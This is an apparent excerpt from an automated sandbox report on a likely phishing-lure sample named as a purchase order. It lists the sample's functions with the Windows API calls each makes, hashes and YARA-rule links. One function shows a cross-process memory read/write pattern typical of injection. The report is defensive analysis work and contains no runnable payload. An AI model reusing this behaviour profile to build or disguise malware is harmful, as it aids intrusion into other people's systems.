                        • Instruction ID: 7c1fa5b1ac03a522eacadf991cc316fe04e1cdf76c96e76db84cd6d38aa7e13a
                        • Opcode Fuzzy Hash: 5c4831b82addd50db9ef4de6079ee42348f1ae4cad48b61a3b2c64bfbda49d68
                        • Instruction Fuzzy Hash: 9D419334A2061A9FCF01DF54C881BBEB7B5BF48384F048069EA5AAB392D774AD55CF50
                        Function 002ECF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002F4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002EC9FE,?,?,00000034,00000800,?,00000034), ref: 002F4D6B
                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002ECFC9
                          • Part of subcall function 002F4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002ECA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 002F4D36
                          • Part of subcall function 002F4C65: GetWindowThreadProcessId.USER32(?,?), ref: 002F4C90
                          • Part of subcall function 002F4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002EC9C2,00000034,?,?,00001004,00000000,00000000), ref: 002F4CA0
                          • Part of subcall function 002F4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002EC9C2,00000034,?,?,00001004,00000000,00000000), ref: 002F4CB6
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002ED036
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002ED083
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                        • String ID: @
                        • API String ID: 4150878124-2766056989
                        • Opcode ID: 1ccab7e5521a372239fdf686ae0847244ace678a12c042fa3708cee3d108ea0f
                        • Instruction ID: 6a5d5981b68f1ad42d124d46208b7dc2add3c686ba72947e0dbaa1a4a2b75643
                        • Opcode Fuzzy Hash: 1ccab7e5521a372239fdf686ae0847244ace678a12c042fa3708cee3d108ea0f
                        • Instruction Fuzzy Hash: A3415C7290021CAEDB11EFA4CD81BEEB778EF09740F048095EA55B7191DA706E55CF60
                        Function 0031A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                        Download Yara Rule
                        APIs
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0034DBF0,00000000,?,?,?,?), ref: 0031A4E6
                        • GetWindowLongW.USER32 ref: 0031A503
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0031A513
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID: SysTreeView32
                        • API String ID: 847901565-1698111956
                        • Opcode ID: 01b1d24c5750d01996b3adc973c3066d5d9c807ecb69c1d30b464916bee80d15
                        • Instruction ID: 7fec316964ef1d7c252527bc32453b2bbbe990ce5997a49b2d4566100cd53a36
                        • Opcode Fuzzy Hash: 01b1d24c5750d01996b3adc973c3066d5d9c807ecb69c1d30b464916bee80d15
                        • Instruction Fuzzy Hash: 7931D231205A05AFDB268E78CC45BE67BA9EB49335F214715F8B5932E0CB30E8A09B51
                        Function 003057D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 003057E7
                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0030581D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CrackInternet_memset
                        • String ID: ?K0$|
                        • API String ID: 1413715105-628506199
                        • Opcode ID: 9780420511376608567ec922ce04259cc16b0a41f45e74f0b05b152571692597
                        • Instruction ID: 217530a7ef18390e28121cb9620df6b463e9b25e1de48510c97fb40481f688ef
                        • Opcode Fuzzy Hash: 9780420511376608567ec922ce04259cc16b0a41f45e74f0b05b152571692597
                        • Instruction Fuzzy Hash: 4E311872D11119EBCF11AFA0CC95AEF7FB9FF18340F108015E815A6162DB319A16DF60
                        Function 00319EE3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00319F6B
                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00319F7F
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00319FA3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$Window
                        • String ID: SysMonthCal32
                        • API String ID: 2326795674-1439706946
                        • Opcode ID: f09a38ae277748a90704738eeed591e0b46f28b9344aecdb82dac6ce5445db84
                        • Instruction ID: eeb1cc19ef3c70b05d0d930c77d857ff05915d88400cc931d9c3690f1157cd4f
                        • Opcode Fuzzy Hash: f09a38ae277748a90704738eeed591e0b46f28b9344aecdb82dac6ce5445db84
                        • Instruction Fuzzy Hash: A421B232510218BBDF168F54CC86FEA3B79EF4C714F120215FA59AB1D0D6B5EC919B90
                        Function 0031A698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0031A74F
                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0031A75D
                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0031A764
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$DestroyWindow
                        • String ID: msctls_updown32
                        • API String ID: 4014797782-2298589950
                        • Opcode ID: 7eba9824023924bba48d10c9e1ddc6e9b58ed343d0dfd7c87b931d4d3eef839f
                        • Instruction ID: 9c849c35549e7f8ec73191ff77b4300afb213fbdb64b93aaf496be38f2df7f50
                        • Opcode Fuzzy Hash: 7eba9824023924bba48d10c9e1ddc6e9b58ed343d0dfd7c87b931d4d3eef839f
                        • Instruction Fuzzy Hash: CC219CB6600604AFEB16DF68DCC1EA737ADEB4A394F150059F9059B291CB70EC518AA1
                        Function 003197B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0031983D
                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0031984D
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00319872
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$MoveWindow
                        • String ID: Listbox
                        • API String ID: 3315199576-2633736733
                        • Opcode ID: 687644483528c3ed45b14d662b86d5f27b1b221190caf59e7ee20ab8cf1923ae
                        • Instruction ID: 16086408d794afb779a3d3473039554d7c2b753e6a0ddc0425d667c866495621
                        • Opcode Fuzzy Hash: 687644483528c3ed45b14d662b86d5f27b1b221190caf59e7ee20ab8cf1923ae
                        • Instruction Fuzzy Hash: 6C21C232610118BFEB1A8F54DC85FEB3BAEEF8D754F128125F9159B190C6719C918BA0
                        Function 0031A217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0031A27B
                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0031A290
                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0031A29D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: msctls_trackbar32
                        • API String ID: 3850602802-1010561917
                        • Opcode ID: cf8a9f7bfeba69edc7a39524a75d213804aca51d299fe6e69d595a2c3b2a3241
                        • Instruction ID: 108ad6aef92def388a8685aa1f3f6261e99ed953044350f6df04994d29f79d68
                        • Opcode Fuzzy Hash: cf8a9f7bfeba69edc7a39524a75d213804aca51d299fe6e69d595a2c3b2a3241
                        • Instruction Fuzzy Hash: C611E771200608BBDB265F65CC46FD73BACEF8DB54F124518FA5596090D2729892DB60
                        Function 002D2F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,002D3028,?), ref: 002D2F79
                        • GetProcAddress.KERNEL32(00000000), ref: 002D2F80
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RoInitialize$combase.dll
                        • API String ID: 2574300362-340411864
                        • Opcode ID: 0d8f105bc6503a9fdcddcbd2726f07930907c08c836674e371962ad8c16d5932
                        • Instruction ID: a441fb7c64e1c91d759aede1d6a69b8be7d6e5b658b17352228d395fd426e9a1
                        • Opcode Fuzzy Hash: 0d8f105bc6503a9fdcddcbd2726f07930907c08c836674e371962ad8c16d5932
                        • Instruction Fuzzy Hash: 3DE01A74694301EFDB625F70ED89B55766CA718706F504424F106E15B0CBB544A4EF04
                        Function 002D3034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002D2F4E), ref: 002D304E
                        • GetProcAddress.KERNEL32(00000000), ref: 002D3055
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RoUninitialize$combase.dll
                        • API String ID: 2574300362-2819208100
                        • Opcode ID: 1b427076dbf9085c3322b92d67168bf045f614cf539a5e64767c7ceb00d7c91d
                        • Instruction ID: b3db54eba7872ec2809bfe138b5bbc9c6dae04b83a6daab493ecb9db7bc952cb
                        • Opcode Fuzzy Hash: 1b427076dbf9085c3322b92d67168bf045f614cf539a5e64767c7ceb00d7c91d
                        • Instruction Fuzzy Hash: 8CE092B4A54201EBDB379F61FE4DB453A6CB700702F500424F10EE11B0CBF44560EA15
                        Function 0032BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LocalTime__swprintf
                        • String ID: %.3d$WIN_XPe
                        • API String ID: 2070861257-2409531811
                        • Opcode ID: fd8d124b9d7cf124f995f3a1dc7a8d9ec7a6e9b7fe3d6aed8d59363b923c1ba2
                        • Instruction ID: a33623e95254e00283f3f2a772617aad3f80b9d3839e4d8c558939879e55bc66
                        • Opcode Fuzzy Hash: fd8d124b9d7cf124f995f3a1dc7a8d9ec7a6e9b7fe3d6aed8d59363b923c1ba2
                        • Instruction Fuzzy Hash: ABE01271C1802CEACB56C690AC469FAF37CAB14300F1488D3B916D1404D3359B68AB11
                        Function 002CE6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,002CE69C,74DF0AE0,002CE5AC,0034DC28,?,?), ref: 002CE6B4
                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 002CE6C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetNativeSystemInfo$kernel32.dll
                        • API String ID: 2574300362-192647395
                        • Opcode ID: 403a28159815c54cefdea125a524920f91d1c3130e71ea338bcea604258bf58e
                        • Instruction ID: fd69e7d0d9608d2f3b74ec18e947864720bc1bc0dfa5cfd4bfbb0944c8bcd145
                        • Opcode Fuzzy Hash: 403a28159815c54cefdea125a524920f91d1c3130e71ea338bcea604258bf58e
                        • Instruction Fuzzy Hash: DFD0A734920F138FDB225F31F849B4336DCAB24301F12952DE487D1164D770C480C650
                        Function 002CE6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,002CE6D9,?,002CE55B,0034DC28,?,?), ref: 002CE6F1
                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 002CE703
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: IsWow64Process$kernel32.dll
                        • API String ID: 2574300362-3024904723
                        • Opcode ID: 0864090a16d9dfb1758db6570ddfc59aaf9e8b7e0e26b016459bd0542c80a857
                        • Instruction ID: eb3fd5896a6e109eeff04ac6052bda6f6b8b758b6114ee23a36e4c36e1956d06
                        • Opcode Fuzzy Hash: 0864090a16d9dfb1758db6570ddfc59aaf9e8b7e0e26b016459bd0542c80a857
                        • Instruction Fuzzy Hash: 3DD05E349107138BDB212F21A888A437BD8AB04300F02852DE496D2190D670C4808790
                        Function 0030EBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0030EBAF,?,0030EAAC), ref: 0030EBC7
                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0030EBD9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                        • API String ID: 2574300362-1816364905
                        • Opcode ID: 65654d7ef570b1dde869c52dda348d0008a2f099c24f6c77d450c11834fbe64f
                        • Instruction ID: ca1a94f65a183af5380a1ec7ed5660e86eef8a710d9a257f31bb0111f560c001
                        • Opcode Fuzzy Hash: 65654d7ef570b1dde869c52dda348d0008a2f099c24f6c77d450c11834fbe64f
                        • Instruction Fuzzy Hash: 33D0A734E087128FD7631F31F898B4236DCAB04304F11C829F497D12A0DF70D8808650
                        Function 002F137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,002F135F,?,002F1440), ref: 002F1389
                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 002F139B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                        • API String ID: 2574300362-1071820185
                        • Opcode ID: f2beaada7283b07c0ff5fbd222c0271d7179618564fbc9305e75ea53ae039dd0
                        • Instruction ID: 658f49467fbb1456235319aec40f4f8c6c23342394a44ed9e636e756958666f1
                        • Opcode Fuzzy Hash: f2beaada7283b07c0ff5fbd222c0271d7179618564fbc9305e75ea53ae039dd0
                        • Instruction Fuzzy Hash: C9D0A938C14313DFD7220F74F848792BAE8AF14308F058869E587D2690DAB0C8A49B90
                        Function 002F13A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,002F1371,?,002F1519), ref: 002F13B4
                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 002F13C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                        • API String ID: 2574300362-1587604923
                        • Opcode ID: 7ca34df6d6989112f15f082f211e800c2175ce8f3972393bdaae0fd78d06c95c
                        • Instruction ID: 0e44528272d57650448351369b7539453387aa50772730490917f92544f1ad4a
                        • Opcode Fuzzy Hash: 7ca34df6d6989112f15f082f211e800c2175ce8f3972393bdaae0fd78d06c95c
                        • Instruction Fuzzy Hash: D3D0A930814713DFD7260F34F848692B6ECAB40304F008469E697D2668DAB0C8E08B90
                        Function 00313ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00313AC2,?,00313CF7), ref: 00313ADA
                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00313AEC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 2574300362-4033151799
                        • Opcode ID: c0979a7461a417acc8063fe0854b82956602cea864bbdd8de4fe70ad936208b7
                        • Instruction ID: 865a168cbe5f8cbdaa58815c96ae44eba0edb1ebf24957469fa07048d1b79cff
                        • Opcode Fuzzy Hash: c0979a7461a417acc8063fe0854b82956602cea864bbdd8de4fe70ad936208b7
                        • Instruction Fuzzy Hash: 02D092709007139FD7669B65E84968676ECAF29715F118429E4E6D2654EAF0C8808A90
                        Function 002EA8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
